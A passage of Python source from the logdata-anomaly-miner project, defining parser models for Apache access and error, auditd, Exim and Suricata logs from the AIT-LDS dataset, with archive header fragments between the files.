aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ FirstMatchModelElement("client_ip", [ SequenceModelElement("client_ip", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), IpAddressDataModelElement("client_ip") ]), SequenceModelElement("localhost", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), FixedDataModelElement("localhost", b"::1") ]), IpAddressDataModelElement("client_ip"), FixedDataModelElement("localhost", b"::1") ]), FixedDataModelElement("sp1", b" "), VariableByteDataModelElement("client_id", alphabet), FixedDataModelElement("sp2", b" "), VariableByteDataModelElement("user_id", alphabet), FixedDataModelElement("sp3", b" ["), DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"), FixedDataModelElement("sp4", b'] "'), FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND", b"MKCOL"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]), FixedDataModelElement("sp7", b'" '), DecimalIntegerValueModelElement("status_code"), FixedDataModelElement("sp8", b" "), DecimalIntegerValueModelElement("content_size"), 
OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"'), ])) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/ApacheErrorParsingModel.py000066400000000000000000000204111437606560100334720ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Apache Error logs from the AIT-LDS.""" model = FirstMatchModelElement("model", [ FixedDataModelElement("mkdir_failed", b"mkdir failed on directory /var/run/samba/msg.lock: Permission denied"), SequenceModelElement("with_data", [ FixedDataModelElement("sp1", b"["), FixedWordlistDataModelElement("day", [b"Mon", b"Tue", b"Wed", b"Thu", b"Fri", b"Sat", b"Sun"]), FixedDataModelElement("sp2", b" "), DateTimeModelElement("time", b"%b %d %H:%M:%S.%f %Y"), FixedDataModelElement("bracket_str", b"] ["), DelimitedDataModelElement("source", b"]"), FixedDataModelElement("pid_str", b"] [pid "), DecimalIntegerValueModelElement("pid"), 
FixedDataModelElement("bracket_str", b"] "), FirstMatchModelElement("fm", [ SequenceModelElement("client", [ FixedDataModelElement("client_str", b"[client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("client_port"), FirstMatchModelElement("fm", [ SequenceModelElement("php", [ FixedDataModelElement("php", b"] PHP "), FirstMatchModelElement("fphp", [ SequenceModelElement("warning", [ FixedDataModelElement("warning_str", b"Warning: "), FirstMatchModelElement("warning", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function", b")"), FixedDataModelElement("compatible_str", b") should be compatible with "), DelimitedDataModelElement("function2", b")"), FixedDataModelElement("compatible_str", b") in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer")]), SequenceModelElement("system", [ FixedDataModelElement("system_str", b"system(): Cannot execute a blank command in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), AnyByteDataModelElement("warning_msg") ])]), SequenceModelElement("notice", [ FixedDataModelElement("notice_str", b"Notice: Undefined index: "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("sp", b" in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), SequenceModelElement("deprecated", [ FixedDataModelElement("deprecated_str", b"Deprecated: Methods with the same name as their class " b"will not be constructors in a future version of PHP; "), DelimitedDataModelElement("class", b" "), FixedDataModelElement("constructor_str", b" has a 
deprecated constructor in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), OptionalMatchModelElement("opt", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]), SequenceModelElement("fatal", [ FixedDataModelElement("fatal_str", b"Fatal error: "), AnyByteDataModelElement("error_msg") ]) ]) ]), SequenceModelElement("ah", [ FixedDataModelElement("ah_str", b"] AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("script", [ FixedDataModelElement("script_str", b"] script '"), DelimitedDataModelElement("script_path", b"'"), FixedDataModelElement("msg", b"' not found or unable to stat"), OptionalMatchModelElement("referer", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]) ]), ]), SequenceModelElement("notice", [ FixedDataModelElement("ah_str", b"AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("end_of_file", [ FixedDataModelElement("end_of_file_str", b"(70014)End of file found: [client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("error_msg", b"] AH01102: error reading status line from remote server "), DelimitedDataModelElement("domain", b":"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("remote_port") ]) ]) ]), SequenceModelElement("bash", [ FixedDataModelElement("bash", b"bash: "), AnyByteDataModelElement("error_msg") ]) ]) return model 
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/AuditdParsingModel.py000066400000000000000000000531151437606560100325200ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement def get_model(): """Return a model to parse Audit logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" seq = [ FixedDataModelElement("audit_str", b"audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("msg2_str", b" msg="), VariableByteDataModelElement("msg2", alphabet), FirstMatchModelElement("fm", [ SequenceModelElement("acct", [ FixedDataModelElement("acct_str", b" acct="), VariableByteDataModelElement("acct", alphabet)]), SequenceModelElement("comm", [ FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet)]), SequenceModelElement("id", [ 
FixedDataModelElement("id_str", b" id="), VariableByteDataModelElement("id", alphabet)]), SequenceModelElement("cmd", [ FixedDataModelElement("cmd_str", b" cmd="), VariableByteDataModelElement("cmd", alphabet)])]), OptionalMatchModelElement( "opt", SequenceModelElement("opt_seq", [ FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("hostname_str", b" hostname="), VariableByteDataModelElement("hostname", alphabet), FixedDataModelElement("addr_str", b" addr="), VariableByteDataModelElement("addr", alphabet)])), FixedDataModelElement("terminal_str", b" terminal="), VariableByteDataModelElement("terminal", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)] model = SequenceModelElement("model", [ FixedDataModelElement("type_str", b"type="), FirstMatchModelElement("type", [ SequenceModelElement("execve", [ FixedDataModelElement("execve_str", b"EXECVE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("argc_str", b"): argc="), DecimalIntegerValueModelElement("argc", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), OptionalMatchModelElement( "opt1", SequenceModelElement("seq1", [ FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), OptionalMatchModelElement( "opt2", SequenceModelElement("seq2", [ FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), OptionalMatchModelElement( "opt3", SequenceModelElement("seq3", [ FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), OptionalMatchModelElement( "opt4", SequenceModelElement("seq4", [ FixedDataModelElement("a4_str", b" a4="), VariableByteDataModelElement("a4", alphabet) ]) ), OptionalMatchModelElement( 
"opt5", SequenceModelElement("seq5", [ FixedDataModelElement("a5_str", b" a5="), VariableByteDataModelElement("a5", alphabet) ]) ), OptionalMatchModelElement( "opt6", SequenceModelElement("seq6", [ FixedDataModelElement("a6_str", b" a6="), VariableByteDataModelElement("a6", alphabet) ]) ), OptionalMatchModelElement( "opt7", SequenceModelElement("seq7", [ FixedDataModelElement("a7_str", b" a7="), VariableByteDataModelElement("a7", alphabet) ]) ), OptionalMatchModelElement( "opt8", SequenceModelElement("seq8", [ FixedDataModelElement("a8_str", b" a8="), VariableByteDataModelElement("a8", alphabet) ]) ), OptionalMatchModelElement( "opt9", SequenceModelElement("seq9", [ FixedDataModelElement("a9_str", b" a9="), VariableByteDataModelElement("a9", alphabet) ]) ), OptionalMatchModelElement( "opt10", SequenceModelElement("seq10", [ FixedDataModelElement("a10_str", b" a10="), VariableByteDataModelElement("a10", alphabet) ]) ), OptionalMatchModelElement( "opt11", SequenceModelElement("seq11", [ FixedDataModelElement("a11_str", b" a11="), VariableByteDataModelElement("a11", alphabet) ]) ), OptionalMatchModelElement( "opt12", SequenceModelElement("seq12", [ FixedDataModelElement("a12_str", b" a12="), VariableByteDataModelElement("a12", alphabet) ]) ), OptionalMatchModelElement( "opt13", SequenceModelElement("seq13", [ FixedDataModelElement("a13_str", b" a13="), VariableByteDataModelElement("a13", alphabet) ]) ), OptionalMatchModelElement( "opt14", SequenceModelElement("seq14", [ FixedDataModelElement("a14_str", b" a14="), VariableByteDataModelElement("a14", alphabet) ]) )]))]))]))]), SequenceModelElement("proctitle", [ FixedDataModelElement("type_str", b"PROCTITLE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("syscall", [ FixedDataModelElement("msg_str", 
b"SYSCALL msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("arch_str", b"): arch="), VariableByteDataModelElement("arch", alphabet), FixedDataModelElement("syscall_str", b" syscall="), DecimalIntegerValueModelElement("syscall", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("success_str", b" success="), VariableByteDataModelElement("success", alphabet), FixedDataModelElement("exit_str", b" exit="), VariableByteDataModelElement("exit", alphabet), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), FixedDataModelElement("items_str", b" items="), VariableByteDataModelElement("items", alphabet), FixedDataModelElement("ppid_str", b" ppid="), VariableByteDataModelElement("ppid", alphabet), FixedDataModelElement("pid_str", b" pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("gid_str", b" gid="), VariableByteDataModelElement("gid", alphabet), FixedDataModelElement("euid_str", b" euid="), VariableByteDataModelElement("euid", alphabet), FixedDataModelElement("suid_str", b" suid="), VariableByteDataModelElement("suid", alphabet), FixedDataModelElement("fsuid_str", b" fsuid="), VariableByteDataModelElement("fsuid", alphabet), FixedDataModelElement("egid_str", b" egid="), VariableByteDataModelElement("egid", alphabet), FixedDataModelElement("sgid_str", b" sgid="), VariableByteDataModelElement("sgid", alphabet), 
FixedDataModelElement("fsgid_str", b" fsgid="), VariableByteDataModelElement("fsgid", alphabet), FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet), FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("key_str", b" key="), VariableByteDataModelElement("key", alphabet)]), SequenceModelElement("path", [ FixedDataModelElement("msg_str", b"PATH msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("item_str", b"): item="), DecimalIntegerValueModelElement("item", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("name_str", b" name="), VariableByteDataModelElement("name", alphabet), FirstMatchModelElement("path", [ SequenceModelElement("nametype", [ FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)]), SequenceModelElement("inode", [ FixedDataModelElement("inode_str", b" inode="), DecimalIntegerValueModelElement("inode", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("dev_str", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("mode_str", b" mode="), VariableByteDataModelElement("mode", alphabet), FixedDataModelElement("ouid_str", b" ouid="), VariableByteDataModelElement("ouid", alphabet), FixedDataModelElement("ogid_str", b" ogid="), VariableByteDataModelElement("ogid", alphabet), FixedDataModelElement("rdev_str", b" rdev="), VariableByteDataModelElement("rdev", alphabet), FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)])])]), SequenceModelElement("login", [ 
FixedDataModelElement("msg1_str", b"LOGIN msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("old_auid_str", b" old-auid="), VariableByteDataModelElement("old_auid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), OptionalMatchModelElement( "tty", SequenceModelElement("tty", [ FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet)])), FixedDataModelElement("old_ses_str", b" old-ses="), VariableByteDataModelElement("old_ses", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)]), SequenceModelElement("sockaddr", [ FixedDataModelElement("msg_str", b"SOCKADDR msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("saddr_str", b"): saddr="), VariableByteDataModelElement("saddr", alphabet)]), SequenceModelElement("unknown", [ FixedDataModelElement("unknwon_str", b"UNKNOWN["), DecimalIntegerValueModelElement("unknown_id", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("msg_str", b"] msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("cred_refr", [ FixedDataModelElement("msg1_str", b"CRED_REFR msg=")] + seq), SequenceModelElement("user_start", [ FixedDataModelElement("msg1_str", b"USER_START msg=")] + 
seq), SequenceModelElement("user_acct", [ FixedDataModelElement("msg1_str", b"USER_ACCT msg=")] + seq), SequenceModelElement("user_auth", [ FixedDataModelElement("msg1_str", b"USER_AUTH msg=")] + seq), SequenceModelElement("user_login", [ FixedDataModelElement("msg1_str", b"USER_LOGIN msg=")] + seq), SequenceModelElement("cred_disp", [ FixedDataModelElement("msg1_str", b"CRED_DISP msg=")] + seq), SequenceModelElement("service_start", [ FixedDataModelElement("msg1_str", b"SERVICE_START msg=")] + seq), SequenceModelElement("service_stop", [ FixedDataModelElement("msg1_str", b"SERVICE_STOP msg=")] + seq), SequenceModelElement("user_end", [ FixedDataModelElement("msg1_str", b"USER_END msg=")] + seq), SequenceModelElement("user_cmd", [ FixedDataModelElement("msg1_str", b"USER_CMD msg=")] + seq), SequenceModelElement("cred_acq", [ FixedDataModelElement("msg1_str", b"CRED_ACQ msg=")] + seq), SequenceModelElement("avc", [ FixedDataModelElement("abc_str", b"AVC msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("apparmor_str", b"): apparmor=\""), DelimitedDataModelElement("apparmor", b"\""), FixedDataModelElement("operation_str", b"\" operation=\""), DelimitedDataModelElement("operation", b"\""), OptionalMatchModelElement( "opt", SequenceModelElement("seq", [ FixedDataModelElement("info_str", b"\" info=\""), DelimitedDataModelElement("info", b"\"")])), FixedDataModelElement("profile_str", b"\" profile=\""), DelimitedDataModelElement("profile", b"\""), FixedDataModelElement("name_str", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("pid_str", b"\" pid="), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("comm_str", b" comm=\""), DelimitedDataModelElement("comm", b"\""), FixedDataModelElement("quote", b"\"")]), SequenceModelElement("user_bprm_fcaps", [ FixedDataModelElement("msg1_str", b"BPRM_FCAPS msg=audit("), 
DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("fver_str", b"): fver="), VariableByteDataModelElement("fver", alphabet), FixedDataModelElement("fp_str", b" fp="), VariableByteDataModelElement("fp", alphabet), FixedDataModelElement("fi_str", b" fi="), VariableByteDataModelElement("fi", alphabet), FixedDataModelElement("fe_str", b" fe="), VariableByteDataModelElement("fe", alphabet), FixedDataModelElement("old_pp_str", b" old_pp="), VariableByteDataModelElement("old_pp", alphabet), FixedDataModelElement("old_pi_str", b" old_pi="), VariableByteDataModelElement("old_pi", alphabet), FixedDataModelElement("old_pe_str", b" old_pe="), VariableByteDataModelElement("old_pe", alphabet), FixedDataModelElement("new_pp_str", b" new_pp="), VariableByteDataModelElement("new_pp", alphabet), FixedDataModelElement("new_pi_str", b" new_pi="), VariableByteDataModelElement("new_pi", alphabet), FixedDataModelElement("new_pe_str", b" new_pe="), VariableByteDataModelElement("new_pe", alphabet)])])]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/EximParsingModel.py000066400000000000000000000227561437606560100322170ustar00rootroot00000000000000"""This module defines a parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import 
SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S"), FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("start", [ FixedDataModelElement("start", b"TLS error"), AnyByteDataModelElement('remainder') ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), IpAddressDataModelElement("ip"), ]), SequenceModelElement("start_daemon", [ FixedDataModelElement("start_daemon_str", b"exim "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("start_deamon_str2", b" daemon started"), AnyByteDataModelElement("msg") ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("end", [ DelimitedDataModelElement("spool", b" "), FixedDataModelElement("spool_file_locked", b" Spool file is locked (another process is handling this message)") ]), SequenceModelElement("mail", [ DelimitedDataModelElement("id", b" "), FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ 
FixedDataModelElement("brack", b"<> "), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("u_str", b" U="), DelimitedDataModelElement("u", b" "), ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", b"H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("sp2", b" S="), DecimalIntegerValueModelElement("s"), ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", b" U="), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("s_str", b" S="), DecimalIntegerValueModelElement("s"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("id_str", b" id="), AnyByteDataModelElement("id") ]) ) ]), AnyByteDataModelElement('remainder') ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FirstMatchModelElement('fm', [ SequenceModelElement('seq', [ FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement( "mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ]) ), OptionalMatchModelElement( "opt", SequenceModelElement( "seq", [ FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("closing_brack", b"> "), ]) ), FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("t_str", b" T="), VariableByteDataModelElement("t", alphabet), OptionalMatchModelElement( "param_opt", SequenceModelElement( "seq", [ 
FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" X="), FixedDataModelElement("x_str", b" X="), DelimitedDataModelElement("x", b" CV="), FixedDataModelElement("cv_str", b" CV="), DelimitedDataModelElement("cv", b" DN="), FixedDataModelElement("dn_str", b" DN="), DelimitedDataModelElement("dn", b" C="), AnyByteDataModelElement("c"), ])) ]), ]) ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), SequenceModelElement("prdr", [ FixedDataModelElement("prdr", b" PRDR "), AnyByteDataModelElement('remainder')]), SequenceModelElement("arrw", [ FixedDataModelElement("arrw", b" -> "), AnyByteDataModelElement('remainder')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ])])]) return model SuricataEventParsingModel.py000066400000000000000000001031421437606560100340000ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import 
SequenceModelElement def get_model(): """Return a model to parse Suricata Event logs from the AIT-LDS.""" conn = SequenceModelElement("conn", [ FixedDataModelElement("src_ip_str", b'"src_ip":"'), FirstMatchModelElement("ip", [ SequenceModelElement("ipv4", [ IpAddressDataModelElement("src_ip"), FixedDataModelElement("src_port_str", b'","src_port":'), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("dest_ip_str", b',"dest_ip":"'), IpAddressDataModelElement("dest_ip"), FixedDataModelElement("dest_port_str", b'","dest_port":'), DecimalIntegerValueModelElement("dest_port"), FixedDataModelElement("proto_str", b',"proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("quote", b'"') ]), SequenceModelElement("ipv6", [ DelimitedDataModelElement("src_ip", b'"'), FixedDataModelElement("dest_ip_str", b'","dest_ip":"'), DelimitedDataModelElement("dest_ip", b'"'), FixedDataModelElement("proto_str", b'","proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("icmp_type_str", b'","icmp_type":'), DecimalIntegerValueModelElement("icmp_type"), FixedDataModelElement("icmp_code_str", b',"icmp_code":'), DecimalIntegerValueModelElement("icmp_code"), ]), ]) ]) http = SequenceModelElement("http", [ FixedDataModelElement("hostname_str", b',"http":{"hostname":"'), DelimitedDataModelElement("hostname", b'"'), FixedDataModelElement("url_str", b'","url":"'), DelimitedDataModelElement("url", b'"', escape=b"\\"), FixedDataModelElement("http_user_agent_str", b'","http_user_agent":"'), DelimitedDataModelElement("http_user_agent", b'"'), OptionalMatchModelElement( "content_type", SequenceModelElement("content_type", [ FixedDataModelElement("http_content_type_str", b'","http_content_type":"'), DelimitedDataModelElement("http_content_type", b'"'), ])), OptionalMatchModelElement( "http_refer", SequenceModelElement("http_refer", [ FixedDataModelElement("http_refer_str", b'","http_refer":"'), DelimitedDataModelElement("http_refer", b'"'), ])), 
